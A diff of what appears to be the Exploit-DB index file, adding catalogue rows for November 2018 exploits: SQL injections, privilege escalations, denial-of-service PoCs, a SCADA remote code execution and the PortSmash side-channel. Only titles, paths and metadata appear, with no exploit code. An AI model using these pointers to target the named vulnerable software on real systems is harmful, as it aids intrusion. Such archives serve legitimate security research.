@@ id,file,description,date,author,type,platform,port 45769,exploits/windows_x86-64/dos/45769.py,"WinMTR 0.91 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64, 45770,exploits/windows_x86-64/dos/45770.py,"CdCatalog 2.3.1 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64, 45772,exploits/windows_x86-64/dos/45772.py,"Zint Barcode Generator 2.6 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64, +45781,exploits/windows_x86-64/dos/45781.py,"Softros LAN Messenger 9.2 - Denial of Service (PoC)",2018-11-05,"Victor Mondragón",dos,windows_x86-64, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10077,6 +10078,9 @@ id,file,description,date,author,type,platform,port 45742,exploits/openbsd/local/45742.sh,"xorg-x11-server 1.20.3 - Privilege Escalation",2018-10-30,"Marco Ivaldi",local,openbsd, 45744,exploits/windows/local/45744.rb,"Any Sound Recorder 2.93 - Buffer Overflow Local (SEH) (Metasploit)",2018-10-30,d3ckx1,local,windows, 45765,exploits/windows/local/45765.txt,"Anviz AIM CrossChex Standard 4.3 - CSV Injection",2018-11-02,LiquidWorm,local,windows, +45778,exploits/windows/local/45778.txt,"Microsoft Internet Explorer 11 - Null Pointer Dereference",2018-11-05,LiquidWorm,local,windows, +45782,exploits/macos/local/45782.c,"LiquidVPN 1.36 / 1.37 - Privilege Escalation",2018-11-05,"Bernd Leitner",local,macos, +45785,exploits/hardware/local/45785.md,"Intel (Skylake / Kaby Lake) - 'PortSmash' CPU SMT Side-Channel",2018-11-02,"Billy Brumley",local,hardware, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -40281,3 +40285,12 @@ id,file,description,date,author,type,platform,port 45766,exploits/php/webapps/45766.txt,"Gate Pass Management System 2.1 - 'login' SQL Injection",2018-11-02,"Ihsan Sencan",webapps,php,80 45767,exploits/php/webapps/45767.txt,"qdPM 9.1 - 'filter_by' SQL Injection",2018-11-02,AkkuS,webapps,php,80 45768,exploits/php/webapps/45768.txt,"Yot CMS 3.3.1 - 'aid' SQL Injection",2018-11-02,"Ihsan Sencan",webapps,php,80 +45773,exploits/php/webapps/45773.txt,"SiAdmin 1.1 - 'id' SQL Injection",2018-11-05,"Ihsan Sencan",webapps,php,80 +45774,exploits/asp/webapps/45774.py,"Advantech WebAccess SCADA 8.3.2 - Remote Code Execution",2018-11-05,"Chris Lyne",webapps,asp, +45775,exploits/php/webapps/45775.txt,"WebVet 0.1a - 'id' SQL Injection",2018-11-05,"Ihsan Sencan",webapps,php,80 +45776,exploits/hardware/webapps/45776.py,"Virgin Media Hub 3.0 Router - Denial of Service (PoC)",2018-11-05,"Ross Inman",webapps,hardware, +45777,exploits/php/webapps/45777.txt,"Poppy Web Interface Generator 0.8 - Arbitrary File Upload",2018-11-05,"Ihsan Sencan",webapps,php, +45779,exploits/php/webapps/45779.txt,"Mongo Web Admin 6.0 - Information Disclosure",2018-11-05,"Ihsan Sencan",webapps,php, +45780,exploits/php/webapps/45780.py,"PHP Proxy 3.0.3 - Local File Inclusion",2018-11-05,AkkuS,webapps,php, +45783,exploits/json/webapps/45783.html,"Royal TS/X - Information Disclosure",2018-11-05,"Jakub Palaczynski",webapps,json,54890 +45784,exploits/php/webapps/45784.txt,"Voovi Social Networking Script 1.0 - 'user' SQL Injection",2018-11-05,"Ihsan Sencan",webapps,php,